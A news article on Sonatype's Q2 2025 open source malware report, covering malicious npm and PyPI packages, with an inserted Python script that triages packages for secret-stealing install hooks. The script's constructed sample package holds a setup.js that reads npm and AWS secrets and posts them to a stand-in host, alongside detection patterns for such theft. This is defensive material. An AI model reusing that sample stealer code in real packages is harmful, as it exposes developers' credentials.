Open source has a malware problem, and it’s getting worse
Sonatype has published its Q2 2025 Open Source Malware Index, identifying 16,279 malicious open source packages across major ecosystems such as npm and PyPI. This brings the total number of malware packages discovered by the company to 845,204. Compared to the same quarter last year, the volume of detected malware has jumped by 188%, highlighting the escalating scale and sophistication of attacks targeting developers, software teams, and CI/CD pipelines.
“Attackers are no longer simply experimenting with open source. The numbers are telling us that threat actors have identified data as the most profitable target, and developers as the easiest way in,” said Brian Fox, CTO of Sonatype. “Developers and security teams must be vigilant, as threats increasingly hide in plain sight within everyday tools and dependencies.”
More than half of attacks aim to steal secrets and sensitive data
Data theft continues to be the most common goal behind malicious open source packages. In the second quarter of 2025, 55 percent of the threats found were built to steal sensitive information, including secrets, passwords, access tokens, API keys, and personal data. Over 4,400 packages were created specifically for this purpose. Many of these attacks focus on the tools and systems developers use, where stealing one piece of data can put entire systems at risk.
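The stealer pattern described above (a package that runs code at install time, reads secret-bearing environment variables and sends them off the host) can be triaged before a dependency reaches a developer machine or CI runner. The following Python script is an added example written for this article, not Sonatype's tooling or code from any package in the report; it inspects an npm manifest and source files for that pairing of indicators. The regexes, environment-variable names and the two sample packages are constructed for illustration.

```python
"""Heuristic triage of an npm package for secret-stealer indicators (example code).

Flags (a) lifecycle scripts that run during `npm install` and (b) source files
that read secret-bearing environment variables and also contain outbound
network code. Neither alone proves malice; the combination is what earns a
manual review before the package is allowed into a CI/CD pipeline.
"""
import re
from dataclasses import dataclass

# Lifecycle scripts npm runs automatically on install: the usual place a
# malicious package puts code that executes before anyone reads the source.
INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Environment variables that commonly carry secrets on developer hosts and CI
# runners (constructed list for this example; extend it for your own estate).
SECRET_ENV = re.compile(
    r"process\.env(?:\.|\[['\"])"
    r"([A-Z0-9_]*(?:TOKEN|SECRET|PASSWORD|PASSWD|API_KEY|ACCESS_KEY|PRIVATE_KEY)[A-Z0-9_]*)"
)
# Calls that can move data off the host.
NETWORK = re.compile(
    r"\b(?:https?\.(?:request|get)|fetch|axios\.\w+|net\.connect|dns\.\w+)\s*\("
)
# Encoded blobs or eval, commonly used to hide a second-stage payload.
ENCODED = re.compile(
    r"Buffer\.from\(\s*['\"][A-Za-z0-9+/=]{40,}['\"]\s*,\s*['\"]base64['\"]\s*\)|\beval\s*\("
)


@dataclass(frozen=True)
class Finding:
    kind: str    # "install_hook" | "secret_read" | "exfil_path" | "encoded_payload"
    where: str   # manifest key or file name
    detail: str  # the script command, variable names or matched call


def scan_manifest(manifest: dict) -> list[Finding]:
    """Flag every lifecycle script that runs at install time."""
    scripts = manifest.get("scripts") or {}
    return [Finding("install_hook", f"scripts.{hook}", scripts[hook])
            for hook in INSTALL_HOOKS if hook in scripts]


def scan_source(name: str, text: str) -> list[Finding]:
    """Flag secret reads, secret-plus-network pairings and encoded payloads in one file."""
    findings = []
    secrets = sorted(set(SECRET_ENV.findall(text)))
    if secrets:
        findings.append(Finding("secret_read", name, ", ".join(secrets)))
        net = NETWORK.search(text)
        if net:  # secrets are read AND something can send them out
            findings.append(Finding("exfil_path", name, net.group(0)))
    enc = ENCODED.search(text)
    if enc:
        findings.append(Finding("encoded_payload", name, enc.group(0)[:40]))
    return findings


def scan_package(manifest: dict, files: dict[str, str]) -> list[Finding]:
    """Run both scanners over a package given its parsed package.json and its files."""
    findings = scan_manifest(manifest)
    for name, text in files.items():
        if name.endswith((".js", ".mjs", ".cjs")):
            findings.extend(scan_source(name, text))
    return findings


def risk_level(findings: list[Finding]) -> str:
    """'high' when install-time execution is paired with exfil or hidden payload."""
    kinds = {f.kind for f in findings}
    if "install_hook" in kinds and kinds & {"exfil_path", "encoded_payload"}:
        return "high"
    if kinds & {"install_hook", "exfil_path", "encoded_payload"}:
        return "review"
    return "low"


# Constructed sample packages (not real packages from the report).
SUSPICIOUS_MANIFEST = {"name": "example-pkg", "version": "1.0.0",
                       "scripts": {"postinstall": "node setup.js"}}
SUSPICIOUS_FILES = {
    "setup.js": (
        "const https = require('https');\n"
        "const data = JSON.stringify({t: process.env.NPM_TOKEN,"
        " a: process.env.AWS_SECRET_ACCESS_KEY});\n"
        "const req = https.request({hostname: 'example.invalid', method: 'POST'}, () => {});\n"
        "req.end(data);\n"
    ),
    "index.js": "module.exports = () => 'hello';\n",
}
BENIGN_MANIFEST = {"name": "tidy-pkg", "version": "2.0.0",
                   "scripts": {"test": "node test.js"}}
BENIGN_FILES = {"index.js": "const mode = process.env.NODE_ENV;\nmodule.exports = { mode };\n"}

if __name__ == "__main__":
    for label, manifest, files in (("suspicious", SUSPICIOUS_MANIFEST, SUSPICIOUS_FILES),
                                   ("benign", BENIGN_MANIFEST, BENIGN_FILES)):
        found = scan_package(manifest, files)
        print(f"{label}: risk={risk_level(found)}")
        for f in found:
            print(f"  [{f.kind}] {f.where}: {f.detail}")
```

In practice the manifest and file map come from the extracted tarball of a package before it is installed, so the lifecycle hooks never get a chance to run; the output is a triage signal for a reviewer, not a verdict, since many legitimate packages use postinstall and many legitimate tools read tokens.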
Data corruption attacks are becoming more common
Researchers also found a sharp increase in malware designed to damage or interfere with data. These types of threats doubled from the previous quarter and now make up just over 3 percent of all malicious packages, with more than 400 identified in Q2. These packages are built to corrupt files, inject harmful code, or disrupt software and infrastructure in other ways.
Cryptomining malware is slightly less common
Malware that hijacks systems to mine cryptocurrency made up about 5 percent of the malicious packages found in Q2. That is a small drop from earlier in the year. The change may suggest that attackers are putting more effort into stealing credentials or gaining deeper access to systems instead of just using up resources.
Well-known threat groups are using open source at scale
Researchers linked 107 malicious packages to the Lazarus Group, a hacking group connected to the North Korean government. Those packages had more than 30,000 known downloads. The findings show that advanced threat groups are using open source ecosystems to carry out spying, financial crime, and other long-term operations.